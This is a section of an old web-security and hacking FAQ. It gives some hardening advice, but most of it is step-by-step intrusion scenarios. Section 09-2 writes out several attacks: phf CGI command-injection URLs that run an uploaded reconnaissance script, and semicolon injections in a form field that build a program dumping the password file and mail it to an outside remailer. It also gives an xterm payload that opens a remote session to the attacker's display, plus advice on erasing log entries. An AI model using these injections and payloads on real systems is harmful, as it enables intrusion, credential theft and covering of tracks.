|
For The Stupid... 09-1. How do I secure things? 09-2. I'm an idiot. Exactly how do hackers get in? 09-3. I have xxx setup and xxx version running. Am I secure?
09-1. How do I secure things?
Read the WWW-Security FAQ.
Users-
As a browser user, wipe your cache and history before accessing suspicious and/or unknown sites. Wipe your cache after each session and use a proxy like http://www.anonymizer.com/. Don't bookmark sites that you wouldn't want people to know you visit.
Web pages can be configured not to be cached by their authors. After visiting a site that requires a password, check your cache to be sure it is not sitting there for anyone to grab.
Turn off Java if you don't trust it. Don't load an applet unless you are sure it's ok.
Admins-
Do not run httpd as root. Most servers can be started as root and then switch to a non-privileged user. Consult your readme files and other documentation.
Do not allow server side includes.
Run Perl scripts with tainting invoked.
All user input should be checked from the standpoint of "only XXXXX format is allowed, deny everything else" instead of "don't allow these things, and let everything else through".
Do not spawn shells if at all possible from any scripts.
Turn off all other access EXCEPT via port 80 if possible. Do not allow anonymous FTP incoming files on the same server as your web server.
Scan your logs (which should be stored off-server) and do it BY HAND periodically.
09-2. I'm an idiot. Exactly how do hackers get in?
This is probably going to be the most fun section of all. This is intended to give hacker a step-by-step example, and to give admins a step-by-step cardiac. Hey Admins, use this to get that budget increase for security!
Scenario 1 -
Your mark is http://thegnome.com. You explore every page listed on the server and you discovered that it is "powered by Linux". A quick port scan reveils a lot of open ports besides port 80, the default for httpd. You do some Web and USENET searches on thegnome.com and discover two users from that site have been posting questions regarding Perl scripting. It is obvious from the posts that they probably are not practicing safe scripting.
Still you are cautious. You know that some admins scan for /etc/passwd in their logs, so you try a different approach. Why not check the security before you attack?
Remembering your port scan, you check out FTP. Anonymous FTP is working on this server (probably left on since the original installation) along with a working /incoming directory. So you upload the following script:
<----- Start of clean.sh -----> #!/bin/sh ## Checks basic security # if grep -i cpm /var/spool/cron/crontabs/* > /dev/null then echo "CPM detected in crontabs" echo "" grep -i cpm /var/spool/cron/crontabs/* else echo "CPM not found on crontabs" fi echo "" if egrep -i -e "lsof|log|promisc|secure|tripwire|tw.db" /var/spool/cron/crontabs/* > /dev/null then echo "Possible security crontab" echo "" egrep -i -e "lsof|log|promisc|secure|tripwire|tw.db" /var/spool/cron/crontabs/* else echo "No sign of security crontabs" fi echo "" echo "root's crontab:" echo "" cat /var/spool/cron/crontabs/root echo "" echo "The following users also have crontabs:" echo "" ls /var/spool/cron/crontabs echo "" echo "Checking logs" echo "" if [ `hostname` = `ping loghost | cut -d" " -f1` ] then echo "You're on the loghost" else echo "Possible off host logging at: `ping loghost | cut -d" " -f1`" fi echo "" echo "Todays date is: `date`" echo "" echo "Checking last 10 wtmp entries" last | head echo "" echo "Checking syslog.conf" echo "Possible log files: " echo "" grep -v -e "^#" /etc/syslog.conf | cut -f2-10 | grep "\/" | tr -d "\011" \ | sort | sort -um | grep -v LOGHOST echo "Checking last altered log files" echo "Checking /var/adm" echo "" ls -lt /var/adm | head echo "" echo "Checking /var/log" echo "" ls -lt /var/log | head <----- End of clean.sh, you get the idea here ----->
Now you run the program:
http://thegnome.com/cgi-bin/phf?%0a/bin/chmod 777 /home/ftp/incoming/clea n.sh&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= http://thegnome.com/cgi-bin/phf?%0a/home/ftp/incoming/clean.sh>/home/ftp/ incoming/results&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
You snag the file this created called "result" from /incoming via ftp and erase the evidence. I leave the remainder of this particular exercise to the active imagination.
Okay, still unsure? Here is one I did just recently...
The site has a shadowed password file. And httpd is running as nobody. But they are not checking user input before running a command from a forked shell on a subscription form. By simply tacking on a semicolon to one particular input field, I am able to run commands and write to any world writable directory. What do I do?
The trick is what you put after the semicolon. It's a name field, so I add a name, and several submits later the site mails me the unshadowed passwd file:
john;echo "#include \"pwd.h\"">/tmp/shadow.c john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c john;echo "printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c john;cc -o /tmp/shadow /tmp/shadow.c john;/tmp/shadow>>/tmp/passwd john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com john;rm /tmp/shadow*;rm /tmp/passwd
Now from the comfort of your own home run Crack or Cracker Jack with a modest dictionary and there you have it.
This technique can be used to have a Web server run port scans, crack a password, explore behind a firewall, and remove yourself from the logs. This is where your knowledge of the Web server's OS comes in handy, and traditional hack techniques can really come into play.
Finally, what is the best web hack of all? The very best thing that would make an admin totally faint? Find the spot that allows you to send those arbitrary unix commands and send this jewel:
sample_data_in_buggy_form;xterm -display my.ip.address:0 &
This opens up a Window if you're running an X server and if the target is not authenticating X. Bingo, you're in as the user running httpd, which is usually nobody (but could be root if the site is REAL stupid). But user nobody can ftp in those hack tools and exploits, and start after root. Need to alter those web log files? No problem, you're probably the owner of those files, simply edit out the lines with your IP address in them. Nasty, very nasty...
09-3. I have xxx setup and xxx version running. Am I secure?
This is a difficult question to answer. You should be running the latest versions of your OS and httpd software with the latest patches applied. You should be running the bare minimum for Web services only.
So the answer is no. No one can be 100% secure unless the server is in a locked, guarded room and powered off. Yes, certain OSes and httpd server versions can be configured securely TODAY, but tomorrow the latest hole will be discovered, or you will load the next version and it has a hole no one thought of.